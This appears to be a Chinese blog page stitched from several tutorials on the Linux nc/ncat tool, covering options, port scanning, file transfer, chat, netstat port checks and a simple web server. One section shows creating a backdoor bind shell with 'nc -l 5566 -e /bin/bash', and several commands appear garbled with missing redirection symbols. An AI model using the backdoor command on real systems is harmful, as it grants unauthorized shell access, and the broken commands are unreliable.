端口扫描工具nmap-dmitry端口扫描命令

hacker|
199

Linux nc命令详解 Linux nc命令怎么用

Linux中nc命令是一个功能强大的网络工具,全称是netcat。

语法:

nc [-hlnruz][-g网关...][-G指向器数目][-i延迟秒数][-o输出文件][-p通信端口][-s来源位址][-v...][-w超时秒数][主机名称][通信端口...]

参数说明:

-g网关 设置路由器跃程通信网关,最丢哦可设置8个。

-G指向器数目 设置来源路由指向器,其数值为4的倍数。

-h 在线帮助。

-i延迟秒数 设置时间间隔,以便传送信息及扫描通信端口。

-l 使用监听模式,管控传入的资料。

-n 直接使用IP地址,而不通过域名服务器。

-o输出文件 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。

-p通信端口 设置本地主机使用的通信端口。

-r 乱数指定本地与远端主机的通信端口。

-s来源位址 设置本地主机送出数据包的IP地址。

-u 使用UDP传输协议。

-v 显示指令执行过程。

-w超时秒数 设置等待连线的时间。

-z 使用0输入/输出模式,只在扫描通信端口时使用。

实例:

1、TCP端口扫描

# nc -v -z -w2 127.0.0.1 1-100

Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!

Connection to 127.0.0.1 53 port [tcp/domain] succeeded!

Connection to 127.0.0.1 80 port [tcp/http] succeeded!

...

nc: connect to 127.0.0.1 port 100 (tcp) failed: Connection refused

2、从192.168.1.2拷贝文件到192.168.1.3

首先在接收端192.168.1.3上: nc -l 1234 test.txt

然后在发送端192.168.1.2上: nc 192.168.1.3 test.txt

注意:先运行接收端,指定一个端口为1234,文件为test.txt,再执行发送端,并且发送端必须存在同名的文件test.txt

3、传输目录

从server1(192.168.16.233)拷贝nginx目录内容到server2(192.168.48.47)上。需要先在server2上,用nc激活监听,

server2上运行:# nc -l 1234 | tar xzv-

server1上运行:# tar czv- nginx | nc 192.168.48.47 1234

4、简单聊天工具

在192.168.1.2上: nc -l 1234

在192.168.1.3上: nc 192.168.1.2 1234

这样,双方就可以相互交流了。使用ctrl+C(或D)退出

linux使用什么命令查看端口 ?

netstat命令各个参数说明如下:

-t : 指明显示TCP端口

-u : 指明显示UDP端口

-l : 仅显示监听套接字(所谓套接字就是使应用程序能够读写与收发通讯协议(protocol)与资料的程序)

-p : 显示进程标识符和程序名称,每一个套接字/端口都属于一个程序。

-n : 不进行DNS轮询,显示IP(可以加速操作)

即可显示当前服务器上所有端口及进程服务,于grep结合可查看某个具体端口及服务情况··

netstat -ntlp //查看当前所有tcp端口·

netstat -ntulp |grep 80 //查看所有80端口使用情况·

netstat -an | grep 3306 //查看所有3306端口使用情况·

查看一台服务器上面哪些服务及端口

netstat -lanp

查看一个服务有几个端口。比如要查看mysqld

ps -ef |grep mysqld

查看某一端口的连接数量,比如3306端口

netstat -pnt |grep :3306 |wc

查看某一端口的连接客户端IP 比如3306端口

netstat -anp |grep 3306

netstat -an 查看网络端口

lsof -i :port,使用lsof -i :port就能看见所指定端口运行的程序,同时还有当前连接。

nmap 端口扫描

netstat -nupl (UDP类型的端口)

netstat -ntpl (TCP类型的端口)

netstat -anp 显示系统端口使用情况

很基础的linux知识,建议跟着《linux就该这么学》系统学习下!

nc 命令使用小结

nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具。比如大家很熟悉使用telnet测试tcp端口,而nc可以支持测试linux的tcp和udp端口,而且也经常被用于端口扫描,甚至把nc作为server以TCP或UDP方式侦听指定端口做简单的模拟测试。

2020年10月07日 - 初稿

阅读原文 -

ncat 或者说 nc 是一款功能类似 cat 的工具,但是是用于网络的。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读、写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠的后端工具。同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。

ncat / nc 既是一个端口扫描工具,也是一款安全工具,还能是一款监测工具,甚至可以做为一个简单的 TCP 代理。 由于有这么多的功能,它被誉为是网络界的瑞士军刀。 这是每个系统管理员都应该知道并且掌握它。

在大多数 Debian 发行版中, nc 是默认可用的,它会在安装系统的过程中自动被安装。 但是在 CentOS 7 / RHEL 7 的最小化安装中, nc 并不会默认被安装。 你需要用下列命令手工安装。

nc的作用:

nc的控制参数不少,常用的几个参数如下所列:

用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。

暂未用到(老版本的nc可能需要在端口号前加-p参数)

指定发送数据的源IP地址,适用于多网卡机

指定nc使用UDP协议,默认为TCP

输出交互或出错信息,新手调试时尤为有用

6)-w

超时秒数,后面跟数字

7)-z

表示zero,表示扫描时不发送任何数据

作用:批量端口扫描,可根据扫描主机的配置调整后台扫描进程数量(手动执行后根据统计的执行时间调整脚本中关于进程数量的参数),通过定时任务作为简单的服务监控(可修改脚本添加其他报警功能,例如邮件等)

实现:使用nc指令扫描端口,使用管道特性控制后台扫描进程数量

不足:仅仅对扫描端口状态为down的信息做记录,并没有其他报警操作

使用:

10 useful ncat (nc) Command Examples for Linux Systems

nc命令用法举例

ncat命令使用实例

Ncat工具功能类似于cat 命令 ,但用于网络。它是一个 命令 行的工具,用于跨网络读取、写入和重定向数据。它被设计成一个可靠的后端工具,可以与 脚本 或其他程序一起使用。

ncat可以是端口扫描工具,安全工具或监视工具,并且还是简单的TCP代理。由于它具有许多功能,因此被称为网络瑞士军刀。它是每个系统管理员都应该了解工具之一。

系统环境

Centos 8

如何安装ncat

在Centos7/8系统中ncat安装包名称为nmap-ncat

[root@server1 ~]# yum -y install nmap-ncat

一、检查TCP的80端口的连接

此示例我们将检查主机名为DCserver的80端口连接。

[root@server1 ~]# nc -vz DCserver 80

Ncat: Version 7.70 ( )

Ncat: Connected to 192.168.0.6:80.

Ncat: 0 bytes sent, 0 bytes received in 0.01 seconds.

-z选项为“Zero - I/O 模式”,用于检查连接状态。

二、创建一个监听端口

下面命令可以创建一个tcp监听端口:

[root@server1 ~]# nc -vl 1234

Ncat: Version 7.70 ( )

Ncat: Listening on :::1234

Ncat: Listening on 0.0.0.0:1234

使用netstat -tlunp查看一下:

在另一台主机中,使用nc命令测试一下该端口的连接:

[root@server1 ~]# nc -vz 192.168.43.131 1234

Ncat: Version 7.70 ( )

Ncat: Connected to 192.168.43.131:1234.

Ncat: 0 bytes sent, 0 bytes received in 0.01 seconds.

然后返回到侦听端,可以看到来自192.168.43.131的45568端口连接侦听端的1234端口。

[root@server1 ~]# nc -vl 1234

Ncat: Version 7.70 ( )

Ncat: Listening on :::1234

Ncat: Listening on 0.0.0.0:1234

Ncat: Connection from 192.168.43.131.

Ncat: Connection from 192.168.43.131:45568.

可以使用-k选项,让侦听端保持打开状态。

三、作为聊天工具

ncat可以用作聊天工具,我们将服务器配置侦听端口,远程主机连接服务器的同一端口并发送消息。在服务器端,运行下面命令开启侦听端口:

[root@qdzabbix ~]# ncat -l 8080

在远程主机中运行下面命令,并且在下面输入聊天内容,按回车发送,在服务端可以看到消息内容了。

[root@server1 ~]# ncat 192.168.0.12 8080

Hello qdzabbix

下面在服务端和远程主机都可以看到消息内容。

想要退出,只需要按Ctrl + c就可以。

四、检查SSH软件版本

可以使用nc命令通过将EXIT命令发送到ssh的22端口上,来检查服务器软件版本,如下所示:

[root@server1 ~]# echo "EXIT" | nc 192.168.43.131 22

SSH-2.0-OpenSSH_7.8

Protocol mismatch.

五、使用ncat创建后门

可以使用ncat命令创建后门。此功能主要由黑客使用。可以这样运行命令,在服务端执行下面一条命令:

[root@qdzabbix ~]# nc -l 5566 -e /bin/bash

-e选项后面指定运行的命令。现在客户端可以连接到服务器上的端口5566,并且可以通过运行以下命令通过bash完全访问我们的系统:

[root@server1 ~]# nc qdzabbix 5566

ls

anaconda-ks.cfg

a.txt

batch

Customer_Supplied_Tickets

custom_resolv.conf

下图中红线圈出来的就是执行的命令。

六、使用ncat运行带有静态页面的Web服务器

可以在本地主机上使用ncat命令启动Web服务器,这将打开静态网页面sample.html。你可以运行如下命令:

首先将下面内容保存到/root/sample.html文件中。

[root@qdzabbix ~]# vim /root/sample.html

html

        head

                titleTest Page/title

        /head

        body

                h1Level 1 header/h1

                h2Subheading/h2

                pNormal text here/p

        /body

/html

然后执行下面命令:

[root@qdzabbix ~]# while true; do nc -l -p 80 /root/sample.html ; done

上面命令中,-p 88选项指定源端口为80。

在浏览器中访问,可以看到页面内容。

总结

ncat工具可以帮助你从使用telnet进行连通性测试切换到使用ncat测试连通性。

0条大神的评论

发表评论